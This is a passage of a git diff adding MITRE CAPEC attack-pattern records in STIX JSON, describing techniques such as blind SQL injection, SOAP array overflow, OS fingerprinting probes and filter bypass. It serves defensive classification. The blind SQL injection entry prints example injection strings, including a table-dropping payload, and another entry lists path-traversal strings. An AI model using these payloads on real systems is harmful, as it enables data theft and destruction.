same folder as the application itself. If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level." + ], + "x_capec_prerequisites": [ + "Attacker has a mechanism to place its malicious libraries in the needed location on the file system." + ], + "x_capec_skills_required": { + "Medium": "Ability to create a malicious library." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232.json b/capec/attack-pattern/attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232.json new file mode 100644 index 0000000000..95e1b4cd75 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232.json @@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--b8c5362d-7036-42d8-8aac-9b1a5803ad68", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ad790f82-30ed-40e5-b718-ea4dda88b232", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "SOAP Array Overflow", + "description": "An attacker sends a SOAP request with an array whose actual length exceeds the length indicated in the request. When a data structure including a SOAP array is instantiated, the sender transmits the size of the array as an explicit parameter along with the data. If the server processing the transmission naively trusts the specified size, then an attacker can intentionally understate the size of the array, possibly resulting in a buffer overflow if the server attempts to read the entire data set into the memory it allocated for a smaller array. This, in turn, can lead to a server crash or even the execution of arbitrary code.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/256.html", + "external_id": "CAPEC-256" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/805.html", + "external_id": "CWE-805" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Robin Cover, ed., XML and Web Services In The News, XML Daily Newslink", + "url": "http://www.xml.org/xml/news/archives/archive.11292006.shtml", + "external_id": "REF-102" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Simple Object Access Protocol (SOAP) 1.1, 2006--11---29, W3C", + "url": "http://www.w3.org/TR/2000/NOTE-SOAP-20000508/#_Toc478383522", + "external_id": "REF-103" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "The targeted SOAP server must trust that the array size as stated in messages it receives is correct, but read through the entire content of the message regardless of the stated size of the array." + ], + "x_capec_resources_required": [ + "The attacker must be able to craft malformed SOAP messages, specifically, messages with arrays where the stated array size understates the actual size of the array in the message." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ae163ec7-669f-4796-91a0-9035b8710836.json b/capec/attack-pattern/attack-pattern--ae163ec7-669f-4796-91a0-9035b8710836.json new file mode 100644 index 0000000000..3c77362384 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ae163ec7-669f-4796-91a0-9035b8710836.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--4182b635-3733-4147-98a2-3bcef6e2350d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ae163ec7-669f-4796-91a0-9035b8710836", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Schedule Software To Run", + "description": "This CAPEC has been deprecated because of is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/557.html", + "external_id": "CAPEC-557" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369.json b/capec/attack-pattern/attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369.json new file mode 100644 index 0000000000..48761e3653 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369.json @@ -0,0 +1,93 @@ +{ + "type": "bundle", + "id": "bundle--59061408-cb8d-4019-977a-7b3ede3a5da3", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ae26a24f-24e3-4a3d-a967-473bfbaac369", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Blind SQL Injection", + "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/7.html", + "external_id": "CAPEC-7" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html", + "external_id": "CWE-89" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html", + "external_id": "CWE-209" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n An adversary may try entering something like \"username' AND 1=1; --\" in an input field. If the result is the same as when the adversary entered \"username\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:\n \"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108\".\n If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:\n \"username'; DROP TABLE trades; --\n ", + "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--ae8e2d1b-fc54-4f25-bd67-3ba98b205cde.json b/capec/attack-pattern/attack-pattern--ae8e2d1b-fc54-4f25-bd67-3ba98b205cde.json new file mode 100644 index 0000000000..783d690b88 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--ae8e2d1b-fc54-4f25-bd67-3ba98b205cde.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--303d1d27-5b4d-496a-9d7e-906d41361eff", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--ae8e2d1b-fc54-4f25-bd67-3ba98b205cde", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "ICMP IP 'ID' Field Error Message Probe", + "description": "An adversary sends a UDP datagram having an assigned value to its internet identification field (ID) to a closed port on a target to observe the manner in which this bit is echoed back in the ICMP error message. The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging. This allows the attacker to construct a fingerprint of specific OS behaviors.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/332.html", + "external_id": "CAPEC-332" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "J. Postel, RFC792 - Internet Control Messaging Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc792.html", + "external_id": "REF-123" + }, + { + "source_name": "reference_from_CAPEC", + "description": "R. Braden, Ed., RFC1122 - Requirements for Internet Hosts - Communication Layers, 1989--10", + "url": "http://www.faqs.org/rfcs/rfc1122.html", + "external_id": "REF-124" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Ofir Arkin, A Remote Active OS Fingerprinting Tool using ICMP, 2002--04, The Sys-Security Group", + "url": "http://ofirarkin.files.wordpress.com/2008/11/login.pdf", + "external_id": "REF-262" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597.json b/capec/attack-pattern/attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597.json new file mode 100644 index 0000000000..74adcc93f2 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--9f68f90b-9f1b-4fcd-a2c9-f93a0363e0e5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--afeca46a-0f28-42f3-9082-9bd39a5cd597", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Physical Theft", + "description": "An adversary gains physical access to a system or device through theft of the item. Possession of a system or device enables a number of unique attacks to be executed and often provides the adversary with an extended timeframe for which to perform an attack. Most protections put in place to secure sensitive information can be defeated when an adversary has physical access and enough time.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/507.html", + "external_id": "CAPEC-507" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "This type of attack requires the existence of a physical target that an adversary believes hosts something of value." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309.json b/capec/attack-pattern/attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309.json new file mode 100644 index 0000000000..861d8e332a --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--ad008435-13d8-4561-9966-4f183cc59e68", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b0176935-5368-4b4a-9bfd-0f0259bf3309", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Privilege Abuse", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html", + "external_id": "CAPEC-122" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html", + "external_id": "CWE-732" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html", + "external_id": "CWE-269" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797.json b/capec/attack-pattern/attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797.json new file mode 100644 index 0000000000..333e492120 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797.json @@ -0,0 +1,60 @@ +{ + "type": "bundle", + "id": "bundle--a4c6f214-a080-4f8e-8027-0103c0f1ef0a", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b0aa23d7-5fa9-427f-8fb4-7c287b109797", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "Cross-Domain Search Timing", + "description": "An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser's same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain. For GET requests an attacker could for instance leverage the \"img\" tag in conjunction with \"onload() / onerror()\" javascript events. For the POST requests, an attacker could leverage the \"iframe\" element and leverage the \"onload()\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim's mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim's e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/462.html", + "external_id": "CAPEC-462" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/385.html", + "external_id": "CWE-385" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html", + "external_id": "CWE-352" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html", + "external_id": "CWE-208" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Chris Evans, Cross-Domain Search Timing, 2009--12---11", + "url": "http://scarybeastsecurity.blogspot.com/2009/12/cross-domain-search-timing.html", + "external_id": "REF-399" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_prerequisites": [ + "Ability to issue GET / POST requests cross domainJava Script is enabled in the victim's browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim's site does not protect search functionality with cross site request forgery (CSRF) protection" + ], + "x_capec_resources_required": [ + "Ability to issue GET / POST requests cross domain" + ], + "x_capec_skills_required": { + "Low": "Some knowledge of Java Script" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b14d0051-6f4d-4b7d-b60d-04be433e7592.json b/capec/attack-pattern/attack-pattern--b14d0051-6f4d-4b7d-b60d-04be433e7592.json new file mode 100644 index 0000000000..ff4c5459ee --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b14d0051-6f4d-4b7d-b60d-04be433e7592.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--bb33533a-ee6b-4b19-a9db-922160ea4dcd", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b14d0051-6f4d-4b7d-b60d-04be433e7592", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: IP Fingerprinting Probes", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that children of CAPEC-312.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/314.html", + "external_id": "CAPEC-314" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3.json b/capec/attack-pattern/attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3.json new file mode 100644 index 0000000000..c74f58342f --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3.json @@ -0,0 +1,55 @@ +{ + "type": "bundle", + "id": "bundle--52c2b957-5fde-4130-b0cb-d9965c5a642e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b1ff1e07-ccde-4a21-abb3-772e6a3128f3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Activity Hijack", + "description": "An adversary intercepts an implicit intent sent to launch a trusted activity and instead launches a counterfeit activity in its place. The malicious activity is then used to mimic the trusted activity's user interface and prompt the target to enter sensitive data as if they were interacting with the trusted activity.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/501.html", + "external_id": "CAPEC-501" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/923.html", + "external_id": "CWE-923" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf", + "external_id": "REF-427" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_prerequisites": [ + "The adversary must have previously installed the malicious application that will run in place of the trusted activity." + ], + "x_capec_resources_required": [ + "Malware capable of acting on the adversary's objectives." + ], + "x_capec_skills_required": { + "High": "The adversary must typically overcome network and host defenses in order to place malware on the system." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8.json b/capec/attack-pattern/attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8.json new file mode 100644 index 0000000000..79e759a76d --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8.json @@ -0,0 +1,124 @@ +{ + "type": "bundle", + "id": "bundle--0546e648-829f-494f-b42f-1a40f6da2be9", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Using Leading 'Ghost' Character Sequences to Bypass Input Filters", + "description": "Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading \"ghost\" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/3.html", + "external_id": "CAPEC-3" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/41.html", + "external_id": "CWE-41" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/179.html", + "external_id": "CWE-179" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/183.html", + "external_id": "CWE-183" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/184.html", + "external_id": "CWE-184" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "\n Alternate Encoding with Ghost Characters in FTP and Web Servers\n Some web and FTP servers fail to detect prohibited upward directory traversals if the user-supplied pathname contains extra characters such as an extra leading dot. For example, a program that will disallow access to the pathname \"../test.txt\" may erroneously allow access to that file if the pathname is specified as \".../test.txt\". This attack succeeds because 1) the input validation logic fails to detect the triple-dot as a directory traversal attempt (since it isn't dot-dot), 2) some part of the input processing decided to strip off the \"extra\" dot, leaving the dot-dot behind.\n Using the file system API as the target, the following strings are all equivalent to many programs:\n .../../../test.txt............/../../test.txt..?/../../test.txt..????????/../../test.txt../test.txt\n As you can see, there are many ways to make a semantically equivalent request. All these strings ultimately result in a request for the file ../test.txt.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The targeted API must ignore the leading ghost characters that are used to get past the filters for the semantics to be the same." + ], + "x_capec_skills_required": { + "Medium": "The ability to make an API request, and knowledge of \"ghost\" characters that will not be filtered by any input validation. These \"ghost\" characters must be known to not affect the way in which the request will be interpreted." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b25dc912-1c7c-4b73-97b7-8e9ae562979a.json b/capec/attack-pattern/attack-pattern--b25dc912-1c7c-4b73-97b7-8e9ae562979a.json new file mode 100644 index 0000000000..3d9d7165b1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b25dc912-1c7c-4b73-97b7-8e9ae562979a.json @@ -0,0 +1,73 @@ +{ + "type": "bundle", + "id": "bundle--c38b101f-c049-4a31-81b9-5714297a78e5", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--b25dc912-1c7c-4b73-97b7-8e9ae562979a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Options Probe", + "description": "This OS fingerprinting probe analyzes the type and order of any TCP header options present within a response segment. Most operating systems use unique ordering and different option sets when options are present. RFC 793 does not specify a required order when options are present, so different implementations use unique ways of ordering or structuring TCP options. TCP options can be generated by ordinary TCP traffic.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/327.html", + "external_id": "CAPEC-327" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--b25dde95-64c2-4432-985b-e3e122866b2e.json b/capec/attack-pattern/attack-pattern--b25dde95-64c2-4432-985b-e3e122866b2e.json new file mode 100644 index 0000000000..f00ede1a70 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--b25dde95-64c2-4432-985b-e3e122866b2e.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--9d649fd2-3f67-43fd-8315-755b45918623", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": 